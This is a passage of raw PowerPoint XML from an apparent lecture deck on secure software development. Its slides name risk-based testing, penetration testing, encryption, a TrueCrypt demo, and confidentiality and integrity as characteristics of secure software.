                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Risk-based security tests</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5111750" y="2836036"/>
            <a:ext cx="1225550" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Static </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>analysis (tools)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6134100" y="3944537"/>
            <a:ext cx="1143000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Risk </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1930400" y="4013493"/>
            <a:ext cx="1016000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Risk </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858000" y="3119711"/>
            <a:ext cx="1447800" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Penetration testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Straight Connector 33"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="27" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="4590867"/>
            <a:ext cx="152400" cy="855030"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="254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5" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="4616269"/>
            <a:ext cx="203200" cy="829628"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="254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26" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1409700" y="3693297"/>
            <a:ext cx="0" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="254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2" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2197100" y="4659824"/>
            <a:ext cx="241300" cy="787421"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="254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2" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="4659824"/>
            <a:ext cx="292100" cy="787421"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="254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28" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3279775" y="3297701"/>
            <a:ext cx="0" cy="2148196"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="254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29" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4191000" y="4619007"/>
            <a:ext cx="171450" cy="826890"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="254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30" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5486400" y="3759366"/>
            <a:ext cx="238125" cy="1686531"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="254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31" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705600" y="4590868"/>
            <a:ext cx="0" cy="855029"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="254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3" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7581900" y="3766042"/>
            <a:ext cx="0" cy="1679855"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="254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33" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7581900" y="3766042"/>
            <a:ext cx="723900" cy="1679855"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FFFF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7029033"/>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430482" y="4843319"/>
            <a:ext cx="6283036" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Symmetric </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Encryption</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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130</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3980873" y="5502564"/>
            <a:ext cx="1370445" cy="9144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a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FAF7C8"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DEMO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="http://library.thinkquest.org/C0126342/pic/fig1-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7732" y="2193349"/>
            <a:ext cx="4276725" cy="1914525"/>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5400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Asymmetric Encryption</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131</a:t>
            </a:fld>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914400"/>
            <a:ext cx="8077200" cy="5527483"/>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43846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3048000"/>
            <a:ext cx="7924800" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>True Crypt Demo</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457200"/>
            <a:ext cx="2143125" cy="2143125"/>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descr="http://asset0.cbsistatic.com/cnwk.1d/i/tim/2009/11/24/Foreman_11124584_4313_truecrypt_257x22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227" y="4191000"/>
            <a:ext cx="2447925" cy="2114550"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="60000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2"/>
            </a:outerShdw>
          </a:effectLst>
          <a:extLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10089139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Security Vulnerability Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1748416" y="2930915"/>
            <a:ext cx="5642984" cy="1219201"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0" smtClean="0"/>
              <a:t>Questions?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="12041701" flipH="1">
            <a:off x="7298514" y="4335923"/>
            <a:ext cx="949687" cy="1803953"/>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chemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="11500" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst>
                <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2456848" flipH="1">
            <a:off x="968763" y="4533447"/>
            <a:ext cx="859648" cy="2404656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d extrusionH="57150">
              <a:bevelT w="38100" h="38100"/>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="14000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFBF8B"/>
                </a:solidFill>
                <a:effectLst>
                  <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
                <a:latin typeface="Cambria" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFBF8B"/>
              </a:solidFill>
              <a:effectLst>
                <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
              </a:effectLst>
              <a:latin typeface="Cambria" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="9535351" flipH="1">
            <a:off x="793612" y="1933451"/>
            <a:ext cx="949687" cy="1401418"/>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9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>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0" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19836951" flipH="1">
            <a:off x="7434275" y="1063226"/>
            <a:ext cx="949687" cy="2492990"/>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56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56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1" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2233443" flipH="1">
            <a:off x="2277485" y="1162062"/>
            <a:ext cx="584096" cy="924339"/>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2" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="8530737" flipH="1">
            <a:off x="4871755" y="456344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3" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="12627025" flipH="1">
            <a:off x="2726518" y="4181126"/>
            <a:ext cx="584096" cy="626166"/>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4" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>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5" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19460650" flipH="1">
            <a:off x="3142397" y="2163174"/>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6" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18277140" flipH="1">
            <a:off x="438513" y="3075786"/>
            <a:ext cx="891282"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14379923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Golden Rule 1.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Maximum Simplicity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1219200"/>
            <a:ext cx="8686800" cy="5334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Make your applications as simple as possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The more complicated you make a software – the greater the chance for mistakes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The greater the chance for a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>security breakthrough</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">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14</a:t>
            </a:fld>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705100" y="4359783"/>
            <a:ext cx="3733800" cy="2485518"/>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6372" y="5257800"/>
            <a:ext cx="2272281" cy="1476375"/>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9936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057400"/>
            <a:ext cx="7924800" cy="1371601"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>Characteristics of a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>Secure Software</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122"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806227" y="2362200"/>
            <a:ext cx="3531547" cy="4191000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10913"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2468214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smtClean="0"/>
              <a:t>Secure Software Characteristics</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Confidentiality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disclosure of information to only intended parties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integrity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Determine whether the information is correct or not</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Privacy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data Protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Controlled Access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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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172200" y="4724400"/>
            <a:ext cx="2362200" cy="1533358"/>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892136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Secure Software Characteristics (2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
